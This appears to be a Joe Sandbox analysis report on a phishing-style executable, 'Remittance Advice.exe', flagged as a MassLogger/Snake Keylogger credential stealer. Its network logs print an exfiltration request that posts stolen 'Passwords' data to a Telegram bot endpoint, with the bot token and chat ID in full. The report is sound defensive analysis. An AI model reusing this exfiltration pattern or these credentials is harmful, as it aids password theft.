DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x827F415A [Thu May 19 00:31:22 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x336c4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x31724	0x31800	894a8b2d6e54b607ab503a75b6eecf14	False	0.6826221196338383	data	7.769247848670264	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x34000	0x586	0x600	4713da45945b2a2056b5d5a9c5d1b92a	False	0.412109375	data	4.008929408222653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	6f6bb9996e1bcbc53f04faf30c5d7cb1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x340a0	0x2fc	data			0.43324607329842935
RT_MANIFEST	0x3439c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:05:31.839208+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49707	193.122.130.0	80	TCP
2025-01-13T13:05:38.057995+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49707	193.122.130.0	80	TCP
2025-01-13T13:05:38.767563+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49712	149.154.167.220	443	TCP
2025-01-13T13:05:39.008817+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.7	49712	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:05:29.973512888 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:29.978420019 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:29.978483915 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:29.978723049 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:29.983549118 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:31.265414000 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:31.307892084 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:31.694056034 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:31.698842049 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:31.795027971 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:31.830347061 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:31.830374002 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:31.830436945 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:31.839207888 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:31.842214108 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:31.842235088 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.324018955 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.324098110 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:32.328825951 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:32.328835964 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.329190969 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.370403051 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:32.382970095 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:32.423326969 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.498848915 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.498914957 CET	443	49708	104.21.32.1	192.168.2.7
Jan 13, 2025 13:05:32.498951912 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:32.507652044 CET	49708	443	192.168.2.7	104.21.32.1
Jan 13, 2025 13:05:37.909594059 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:37.914381027 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:38.011900902 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:05:38.057995081 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:05:38.108341932 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.108366966 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.108414888 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.109041929 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.109055996 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.720987082 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.721049070 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.723057985 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.723062992 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.723392963 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.725199938 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.767322063 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:38.767433882 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:38.767438889 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:39.008896112 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:39.009032011 CET	443	49712	149.154.167.220	192.168.2.7
Jan 13, 2025 13:05:39.009179115 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:05:39.009692907 CET	49712	443	192.168.2.7	149.154.167.220
Jan 13, 2025 13:06:43.012000084 CET	80	49707	193.122.130.0	192.168.2.7
Jan 13, 2025 13:06:43.012203932 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:07:12.539242029 CET	49707	80	192.168.2.7	193.122.130.0
Jan 13, 2025 13:07:12.544136047 CET	80	49707	193.122.130.0	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:05:29.947690964 CET	55850	53	192.168.2.7	1.1.1.1
Jan 13, 2025 13:05:29.954607010 CET	53	55850	1.1.1.1	192.168.2.7
Jan 13, 2025 13:05:31.817876101 CET	49512	53	192.168.2.7	1.1.1.1
Jan 13, 2025 13:05:31.824997902 CET	53	49512	1.1.1.1	192.168.2.7
Jan 13, 2025 13:05:38.100150108 CET	60288	53	192.168.2.7	1.1.1.1
Jan 13, 2025 13:05:38.107002020 CET	53	60288	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:05:29.947690964 CET	192.168.2.7	1.1.1.1	0xbed2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.817876101 CET	192.168.2.7	1.1.1.1	0x93	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:38.100150108 CET	192.168.2.7	1.1.1.1	0x78d3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:29.954607010 CET	1.1.1.1	192.168.2.7	0xbed2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:31.824997902 CET	1.1.1.1	192.168.2.7	0x93	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:05:38.107002020 CET	1.1.1.1	192.168.2.7	0x78d3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49707	193.122.130.0	80	7068	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:05:29.978723049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:05:31.265414000 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:05:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d03b2f885c8ae2f9c781f88c5286cbd5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:31.694056034 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:05:31.795027971 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:05:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: af182f16c95d437bca23b5c705aab0ba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:37.909594059 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:05:38.011900902 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:05:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b84c8da3429a4f0b88a6e6208ff8e50a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	104.21.32.1	443	7068	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:05:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:05:32 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:05:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2084721 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz1aG6WHnaeQLLUB8Wye0GtsBKXhDl4f07CgSpCH34wtJXydlPR3%2BntF1oTtn3NYpwClNiHKLOgY6jd9X43n3fqpggJ3Crxm4pr65IuesWIBDvVWudwPU2XwuD5mNM3wwAZuUieS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015414dba8441a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1833019&cwnd=241&unsent_bytes=0&cid=2c7829bc23201a18&ts=187&x=0"
2025-01-13 12:05:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49712	149.154.167.220	443	7068	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:05:38 UTC	299	OUT	POST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1a Host: api.telegram.org Content-Length: 1088 Connection: Keep-Alive
2025-01-13 12:05:38 UTC	1088	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 30 61 65 62 62 34 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33a0aebb4d1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-13 12:05:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 12:05:38 GMT Content-Type: application/json Content-Length: 540 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 12:05:39 UTC	540	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 39 32 35 34 35 31 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 61 7a 69 73 6d 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 31 30 39 34 35 38 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 6d 61 6e 75 65 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 63 68 61 65 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 39 39 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 Data Ascii: {"ok":true,"result":{"message_id":839,"from":{"id":7509254516,"is_bot":true,"first_name":"NOVA2025","username":"Razismbot"},"chat":{"id":6410945890,"first_name":"Emmanuel","last_name":"Michael","type":"private"},"date":1736769938,"document":{"file_name":"

Target ID:	0
Start time:	07:05:28
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\Remittance Advice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Remittance Advice.exe"
Imagebase:	0xf90000
File size:	205'312 bytes
MD5 hash:	667EFC5A5AC024A15CE73A7A352EA598
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:05:29
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7ff75da10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	123
Total number of Limit Nodes:	10

Executed Functions

Function 07541648 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358cf7745f6b03bcb9e43fa1bf63e5f2b01ffb7dc0c9df341eefcbef31148a44
Instruction ID: 8fb9712bf24e62435e815c0ab0ba8f1997162c69496e58009946282c0ea425d4
Opcode Fuzzy Hash: 358cf7745f6b03bcb9e43fa1bf63e5f2b01ffb7dc0c9df341eefcbef31148a44
Instruction Fuzzy Hash: B4F13CB4A0060ACFDB14DFA5C948B9DBBF2FF84308F158569E409AF255DB70AD85CB81

Function 030ED530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030ED5BE
GetCurrentThread.KERNEL32 ref: 030ED5FB
GetCurrentProcess.KERNEL32 ref: 030ED638
GetCurrentThreadId.KERNEL32 ref: 030ED691

Strings

4'q, xrefs: 030ED509

Memory Dump Source

Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'q
API String ID: 2063062207-1807707664
